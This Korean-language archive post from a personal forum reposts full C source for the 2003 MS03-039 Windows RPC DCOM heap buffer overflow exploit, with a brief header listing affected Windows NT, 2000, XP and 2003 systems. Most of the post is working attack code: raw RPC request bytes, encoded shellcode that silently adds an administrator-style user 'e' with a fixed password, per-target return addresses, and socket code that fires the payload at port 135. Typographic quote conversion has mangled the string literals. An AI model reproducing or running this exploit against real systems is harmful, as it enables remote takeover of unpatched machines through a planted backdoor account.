(보안자료) Windows NT계열 RPC Buffer Overflow 공격코드 > 자료 창고

본문 바로가기
루시웹닷넷 [DX Network]
로고정보
사이트 내 전체검색


회원로그인

패밀리 사이트

구글 커스텀 검색

주요 콘텐츠

접속자 정보

  • < 방문자의 접속 지역 >
  • 미국
    18.97.x.y

서버시간 (KST)

  • 2025/02/08
    02:09:07 AM
  • (음력 2025/01/11)
자료 창고

(보안자료) Windows NT계열 RPC Buffer Overflow 공격코드

페이지 정보

[프로필 사진]

작성자 : 루시 쪽지보내기 작성글 보기 (21)

조회수 : 2,648

작성일 : 2017-05-15 20:36:52

레벨 : 18 | 경험치 : 28% | 출석일수 : 301일

0.0.x.y

본문

공격용 소스코드 제목 :
윈도 nt/2k/xp/2003 RPC 버퍼오버플로우

발표날짜 :
2003.09.15

해당 시스템 :
- MICROSOFT Windows NT 4.0 Workstation
- MICROSOFT Windows NT 4.0 Server
- MICROSOFT Windows 2000 Professional
- MICROSOFT Windows 2000 Server
- MICROSOFT Windows XP
- MICROSOFT Windows 2003 Server

공격유형 :
원격

위험도 :


문제점 :
RPC 인터페이스에서 발견된 버퍼오버런 취약점을 이용하여 공격하면 원격에서 135 포트를 통하여 위조된 리퀘스트를 보냄으로써 코드를 실행 시킬 수 있게 된다.

공격법 / 공격용 소스코드 :

/*
http://www.xfocus.net/tools/200309/MS03-039-exp.c

http://www.immunitysec.com/papers/msrpcheap.pdf
http://www.immunitysec.com/papers/msrpcheap2.pdf

***** falshsky & benjurry & Dave Aitel *****

*/

#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

#pragma comment(lib,“ws2_32“)

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

//user=“e“ pass=“asd#321“
unsigned char sc_add_user[]=
“xEBx10x5Ax4Ax33xC9x66xB9x3Ex01x80x34x0Ax99xE2xFA“
“xEBx05xE8xEBxFFxFFxFFx70x31x99x99x99xC3x21x95x69“
“x64xE6x12x99x12xE9x85x34x12xD9x91x12x41x12xEAxA5“
“x9Ax6Ax12xEFxE1x9Ax6Ax12xE7xB9x9Ax62x12xD7x8DxAA“
“x74xCFxCExC8x12xA6x9Ax62x12x6BxF3x97xC0x6Ax3FxED“
“x91xC0xC6x1Ax5Ex9DxDCx7Bx70xC0xC6xC7x12x54x12xDF“
“xBDx9Ax5Ax48x78x9Ax58xAAx50xFFx12x91x12xDFx85x9A“
“x5Ax58x78x9Bx9Ax58x12x99x9Ax5Ax12x63x12x6Ex1Ax5F“
“x97x12x49xF3x9AxC0x71xBDx99x99x99xF1x66x66x66x99“
“xF1x99x89x99x99xF3x9Dx66xCEx6Dx22x81x69x64xE6x10“
“x9Ax1Ax5Fx95xAAx59xC9xCFx66xCEx61xC9x66xCEx65xAA“
“x59x35x1Cx59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7B“
“x77xAAx59x5Ax71xCAx66x66x66xDExFCxEDxC9xEBxF6xFA“
“xD8xFDxFDxEBxFCxEAxEAx99xD1xFCxF8xE9xDAxEBxFCxF8“
“xEDxFCx99xCExF0xF7xDCxE1xFCxFAx99xDCxE1xF0xEDxC9“
“xEBxF6xFAxFCxEAxEAx99xFAxF4xFDxB9xB6xFAxB9xF7xFC“
“xEDxB9xECxEAxFCxEBxB9xFCxB9xF8xEAxFDxBAxAAxABxA8“
“xB9xB6xF8xFDxFDxB9xBFxBFxB9xF7xFCxEDxB9xF5xF6xFA“
“xF8xF5xFExEBxF6xECxE9xB9xF8xFDxF4xF0xF7xF0xEAxED“
“xEBxF8xEDxF6xEBxEAxB9xFCxB9xB6xF8xFDxFDx99“;
#define sc_offset 0x24
#define sc_max 0x208
#define jmp_addr_offset sc_max+sc_offset+0x8
#define top_seh_offset jmp_addr_offset+0x4

unsigned char sc[]=
“x31x00x32x00x37x00x2ex00x30x00x2ex00“
“x30x00x2ex00x31x00x5cx00x49x00x50x00“
“x43x00x24x00x5cx00“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“
“xe9xf3xfdxffxff“
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE“;

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

struct
{
char *os;
DWORD dwTopSeh;
char *seh;
DWORD dwJmpAddr;
char *jmp;
}
targets[] =
{
{ “2kEnSp4+MS03-026“,
0x7c54144c,
“kernel32.dll v5.0.2195.6688“,
0x77a1b496,
“OLEAUT32.dll v2.40.4522.0“},
{ “2kEnSp3+SomeHotFixs+MS03-026“,
0x77eda1f0,
“kernel32.dll v5.0.2195.6079“,
0x77a1afa9,
“OLEAUT32.dll v2.40.4518.0“}
}, v;
void main(int argc,char ** argv)
{
WSADATA WSAData;
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
int i, iType;

printf( “MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n\“
\“Base on flashsky‘s MS03-026 expn\“
\“Code by ey4s<eyas#xfocus.org>\n\“
\“2003-09-16\n\“
\“Welcome to http://www.xfocus.net\n\“
\“Thanks to flashsky & benjurry & Dave Aitel\n\“
\“If success, target will add a user \“e\“ and password is \“asd#321\“\n\n“);

if(argc!=3)
{
printf(“Usage: %s <target> <type>\n“, argv[0]);
for(i = 0; i < sizeof(targets)/sizeof(v); i++)
printf( “<%d> %s\n\“
\“ TopSeh=0x%.8x in %s\n\“
\“ JmpAddr=0x%.8x in %s\n“,
i, targets[i].os,
targets[i].dwTopSeh, targets[i].seh,
targets[i].dwJmpAddr, targets[i].jmp);
return;
}

iType = atoi(argv[2]);
if((iType<0) || iType > sizeof(targets)/sizeof(v))
{
printf(“[-] Wrong type.\n“);
return;
}

memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
printf(“[+] Prepare shellcode completed.\n“);

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf(“WSAStartup error.Error:%d\n“,WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf(“Socket failed.Error:%d\n“,WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf(“Connect failed.Error:%d“,WSAGetLastError());
return;
}
printf(“[+] Connect to %s:135 success.\n“, argv[1]);

if(sizeof(sc_add_user) > sc_max)
{
printf(“[-] shellcode too long, exit.\n“);
return;
}


len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //??????????
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//??????????
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
//?????????
*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

len = send(sock,bindstr,sizeof(bindstr),0);
if(len<=0)
{
printf(“[-] Send failed.Error:%d\n“,WSAGetLastError());
return;
}
else
printf(“[+] send %d bytes.\n“, len);

len=recv(sock,buf1,1000,0);
if(len<=0)
{
printf(“[-] recv error:%d\n“, GetLastError());
return;
}
else
printf(“[+] recv %d bytes.\n“, len);

len = send(sock,buf2,len1,0);
if(len<=0)
{
printf(“[-] Send failed.Error:%d\n“,WSAGetLastError());
return;
}
else
printf(“[+] send %d bytes.\n“, len);
len=recv(sock,buf1,1024,0);
if(len<=0)
{
printf(“[+] Target crash or exploit success? :)\n“);
}
else
printf(“[-] recv %d bytes. Bad luck!\n“, len);
}

댓글목록

등록된 댓글이 없습니다.

자료 창고 목록

Total 177건 6 페이지
자료 창고 목록
번호 제목 글쓴이 날짜 조회
27 하드디스크 설계 지침서 루시 쪽지보내기 작성글 보기 2017.05 1981
26 MIDI 파일 분석자료 텍스트 (프로그래밍 참조용) 루시 쪽지보내기 작성글 보기 2017.05 1808
25 Sony Video SLV-ED22 SLV-ED55 SLV-ED88 SLV-ED99 Service Manua… 루시 쪽지보내기 작성글 보기 2017.05 1960
24 잦죽 도구 (시스템 통제 유틸) 루시 쪽지보내기 작성글 보기 2017.05 1989
23 HanIRC 웹 대화방 프로그램 (ActiveX) 루시 쪽지보내기 작성글 보기 2017.05 2448
22 엽기 고양이마리오 게임 루시 쪽지보내기 작성글 보기 2017.05 2452
21 고해상도 bmp 하늘 배경 루시 쪽지보내기 작성글 보기 2017.05 2346
20 Fake Del 루시 쪽지보내기 작성글 보기 2017.05 2417
19 돈먹기 게임..(윈도우용) 루시 쪽지보내기 작성글 보기 2017.05 2486
18 TCPVIEW (tcp 연결 표시 유틸리티) 루시 쪽지보내기 작성글 보기 2017.05 2617
17 NetBrute Scanner 1.0.0.9 (네트워크 포트스캔 기능 있음) 루시 쪽지보내기 작성글 보기 2017.05 2922
16 Teleport Pro 1.50 루시 쪽지보내기 작성글 보기 2017.05 3257
15 LBC 부트 바이러스 어셈블리어 소스코드 루시 쪽지보내기 작성글 보기 2017.05 3797
14 한때 유명했던 CIH 바이러스 어셈블 소스코드 루시 쪽지보내기 작성글 보기 2017.05 2519
13 컴퓨터 바이러스 제작 (완전초보용) 문서파일 루시 쪽지보내기 작성글 보기 2017.05 2267
12 주민등록번호를 만들어내는 규칙에 대해서 설명과 참고용 소스 루시 쪽지보내기 작성글 보기 2017.05 2254
11 핑퐁 바이러스 베이직 소스코드 PingPong 루시 쪽지보내기 작성글 보기 2017.05 3017
열람중 (보안자료) Windows NT계열 RPC Buffer Overflow 공격코드 루시 쪽지보내기 작성글 보기 2017.05 2649
9 C# 응용 프로그램의 중복 실행 방지하기 코드 예제 루시 쪽지보내기 작성글 보기 2017.05 4223
8 MacOS 용 Windows Media Player 누리 쪽지보내기 작성글 보기 2017.05 3478
7 MS-DOS 6 소스코드 루시 쪽지보내기 작성글 보기 2017.05 2862
6 자작 워크2맵 2가지.. 루시 쪽지보내기 작성글 보기 2017.05 2953
5 DOS Game Wolfenstein 3D source code 루시 쪽지보내기 작성글 보기 2017.05 3054
4 중국의 쥐가 치킨으로 둔갑 (스크랩 자료) 루시 쪽지보내기 작성글 보기 2017.05 3087
3 Kutar Mini games 루시 쪽지보내기 작성글 보기 2017.05 2702
2 게임...Return To Castle Wolfenstein 메뉴얼 PDF 루시 쪽지보내기 작성글 보기 2017.05 2184
1 Diablo Hellfire 한글 메뉴얼 (HWP파일) 루시 쪽지보내기 작성글 보기 2017.05 2518
게시물 검색

접속자집계

오늘
70
어제
330
최대
2,136
전체
635,625
Contact and information

사이트 소개 개인정보처리방침 서비스이용약관 사이트맵

Copyright © 닻별 네트웍스 (DX Network) All rights reserved.

주요 보유 도메인 현황

lucyweb.net

lucyweb.kr

darkfusion.or.kr

4chawon.net

nemocity.net

datbyeol.com

datbyeol.net

dxn.kr

dxnw.kr

lucyweb.net/special/psychopath/

ghostwho.net

ghostwho.kr